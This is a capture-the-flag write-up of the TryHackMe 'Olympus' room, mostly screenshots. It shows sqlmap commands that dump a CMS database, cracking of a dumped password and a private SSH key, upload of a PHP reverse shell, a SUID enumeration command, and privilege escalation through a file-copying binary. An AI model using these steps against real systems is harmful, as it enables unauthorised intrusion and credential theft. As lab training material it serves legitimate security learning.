---
# System prepended metadata

title: THM-Olympus
tags: [TryHackMe]

---

# THM-Olympus
![image](https://hackmd.io/_uploads/B11hedl0ll.png)
![image](https://hackmd.io/_uploads/HJd2eulCge.png)
![image](https://hackmd.io/_uploads/H1y7Q_e0xl.png)
![image](https://hackmd.io/_uploads/B14_-uxAgx.png)
![image](https://hackmd.io/_uploads/HJXSHugClg.png)
![image](https://hackmd.io/_uploads/B1K3rOgRxg.png)
This web use victor's cms
![image](https://hackmd.io/_uploads/ryuMw_e0xg.png)
https://www.exploit-db.com/exploits/48734
![image](https://hackmd.io/_uploads/Byzrwux0gl.png)
This is sql injection union base
I use sqlmap to dump db
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3
```
![image](https://hackmd.io/_uploads/SkIiOdx0xe.png)
![image](https://hackmd.io/_uploads/BybAu_gAel.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --dbs -D olympus --tables --random-agent -v 3
```
![image](https://hackmd.io/_uploads/SyaZtug0xx.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus --tables chats --columns --random-agent -v 3
```
![image](https://hackmd.io/_uploads/H1RPtOgAgl.png)
![image](https://hackmd.io/_uploads/HkdOFdgCll.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" -D olympus --tables flag --columns --dump --random-agent -v 3
```
![image](https://hackmd.io/_uploads/H1jaFOe0eg.png)
![image](https://hackmd.io/_uploads/SyiCYueCex.png)
![image](https://hackmd.io/_uploads/HkAJ5uxRex.png)
![image](https://hackmd.io/_uploads/r1cecOxCge.png)
![image](https://hackmd.io/_uploads/B1VZqOxRlx.png)
![image](https://hackmd.io/_uploads/SJRbq_xAle.png)
Let's crack the password in tables user
![image](https://hackmd.io/_uploads/B1VhsOxCel.png)
In 3 password just crack user prometheus:summertime
![image](https://hackmd.io/_uploads/ryn03_lCxg.png)
Then i login to admin by account prometheus, this web don't have interested information
![image](https://hackmd.io/_uploads/HkU8aOe0eg.png)
The email have new domain chat.olympus.thm add it to /etc/hosts
![image](https://hackmd.io/_uploads/rkm60ueCgg.png)
Get i find the login page. 
![image](https://hackmd.io/_uploads/Byu7xYx0el.png)
![image](https://hackmd.io/_uploads/Hk6okKxAee.png)
Use credential of user prometheus to login and see the previous messages he exchanged with Zeus
![image](https://hackmd.io/_uploads/r16AJYgClg.png)
Looking at the discussion, it seems that Prometheus tried to upload a file to the server and download it back, probably to know if it was possible to upload a php shell this way. This didn’t work, because the developer implemented filename randomization on the uploaded files.
We can also upload any file we want, and a quick try shows us that the documents are probably stored in /uploads, but just like Prometheus, we can’t seem to access them afterwards. We need to find a way to know the names the uploaded files now have.
Let's create revshell
![image](https://hackmd.io/_uploads/B1CkWYl0xe.png)
If we go back to the database we dumped earlier, we can see a table named “chats”. If we look in it, we see the following :
![image](https://hackmd.io/_uploads/rJ5MWtlRge.png)
I can access to the file was upload
![image](https://hackmd.io/_uploads/H1vX7FxAee.png)
I upload file shell.php via chats in website
![image](https://hackmd.io/_uploads/SkfsPYeCee.png)
```
sqlmap -u "http://olympus.thm/~webmaster/search.php" --data="search=1337*&submit=" --batch -D olympus -T chats -C file,dt --dump
```
![image](https://hackmd.io/_uploads/S1YL_YxAel.png)
Open the file php via /upload and get revshell
![image](https://hackmd.io/_uploads/r1NcdFeRee.png)
![image](https://hackmd.io/_uploads/BJk_KtxAge.png)
Our current user cannot use sudo, so this way is out. We can try to look for SUID binaries with this command :
```
find / -perm -u=s -type f 2>/dev/null
```
![image](https://hackmd.io/_uploads/rJUEjFg0el.png)
I find the usual binaries such as /usr/bin/su or /usr/bin/umount, but one of them is something I don’t usually see : /usr/bin/cputils. 
I said that the file is interesting because it can be run as zeus and its functionality is copying files.
I immediately got an idea to copy zues’s private ssh key so that I can login as zeus.
![image](https://hackmd.io/_uploads/rJEx2tg0xx.png)
I save file and use ssh2john to change to file id_rsa to file can crack by john
![image](https://hackmd.io/_uploads/r1r9nKlAxg.png)
Now ssh to user zeus
![image](https://hackmd.io/_uploads/HJR-6KeCll.png)
In /var/www/html i find the file VIGQFQFMYOST.php it looklike reverse shell backdoor
![image](https://hackmd.io/_uploads/Bk4PpYlCxx.png)
Looking at the code, it executes a very specific command: `uname -a; w; /lib/defended/libc.so.99`. Let’s see what happens when we run that last part ourselves.
![image](https://hackmd.io/_uploads/BkPsCKxCel.png)
![image](https://hackmd.io/_uploads/S1W3AKgRel.png)
![image](https://hackmd.io/_uploads/r1-KJcgRlg.png)